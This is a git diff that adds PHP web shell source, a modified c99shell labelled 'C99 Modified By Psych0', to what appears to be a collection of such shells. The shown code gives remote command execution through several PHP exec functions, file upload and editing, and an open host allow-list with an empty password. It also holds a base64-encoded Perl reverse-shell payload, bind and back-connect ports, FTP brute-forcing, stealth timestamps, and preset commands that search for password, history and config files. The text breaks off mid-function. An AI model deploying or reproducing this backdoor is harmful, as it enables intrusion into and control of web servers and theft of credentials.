+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. 
+ $imgequals = array(
+ "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+ "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+ "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+ "ext_html"=>array("ext_html","ext_htm"),
+ "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+ "ext_lnk"=>array("ext_lnk","ext_url"),
+ "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+ "ext_doc"=>array("ext_doc","ext_dot"),
+ "ext_js"=>array("ext_js","ext_vbs"),
+ "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+ "ext_wri"=>array("ext_wri","ext_rtf"),
+ "ext_swf"=>array("ext_swf","ext_fla"),
+ "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+ "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+ header("Content-type: image/gif");
+ header("Cache-control: public");
+ header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+ header("Cache-control: max-age=".(60*60*24*7));
+ header("Last-Modified: ".date("r",filemtime(__FILE__)));
+ foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+ if (empty($images[$img])) {$img = "small_unk";}
+ if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+ echo base64_decode($images[$img]);
+ }
+ else
+ {
+ foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! 
Remove \$images[".$d."]<br>");}}}}
+ natsort($images);
+ $k = array_keys($images);
+ echo "<center>";
+ foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+ echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" 
cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/php/PHPshell/c99_PSych0/c99_PSych0.jpg b/php/PHPshell/c99_PSych0/c99_PSych0.jpg
new file mode 100644
index 0000000..417c354
Binary files /dev/null and b/php/PHPshell/c99_PSych0/c99_PSych0.jpg differ
diff --git a/php/PHPshell/c99_PSych0/c99_PSych0.php b/php/PHPshell/c99_PSych0/c99_PSych0.php
new file mode 100644
index 0000000..0969b91
--- /dev/null
+++ b/php/PHPshell/c99_PSych0/c99_PSych0.php
@@ -0,0 +1,3284 @@ +<?php +//Starting calls +ini_set("max_execution_time",0); +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +$adires=""; +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #16"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. 
if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "<center><b>C99 Modified By Psych0 </b></center>"; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... 
+// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ + $fp = @fopen($link,"r"); + while(!feof($fp)) + { + $cont.= fread($fp,1024); + } + fclose($fp); + + $fp2 = @fopen($file,"w"); + fwrite($fp2,$cont); + fclose($fp2); +} + + + + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "<b>" (default) + string {closetag} - close html-tag, e.g. 
"</b>" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . 
-type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . 
-type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), + array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), + array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), + array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), + array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), + array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), + array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), + array("<b>Encoder</b>",$surl."act=encoder&d=%d"), + array("<b>Tools</b>",$surl."act=tools&d=%d"), + array("<b>Proc.</b>",$surl."act=processes&d=%d"), + array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>Sec.</b>",$surl."act=security&d=%d"), + array("<b>SQL</b>",$surl."act=sql&d=%d"), + array("<b>PHP-code</b>",$surl."act=eval&d=%d"), + array("<b>Update</b>",$surl."act=update&d=%d"), + array("<b>Feedback</b>",$surl."act=feedback&d=%d"), + array("<b>Self remove</b>",$surl."act=selfremove"), + 
array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function err($n,$txt='') +{ +echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '</b></div></font></td></tr></table>'; +return null; +} +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a 
href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global 
$sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . 
" B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != 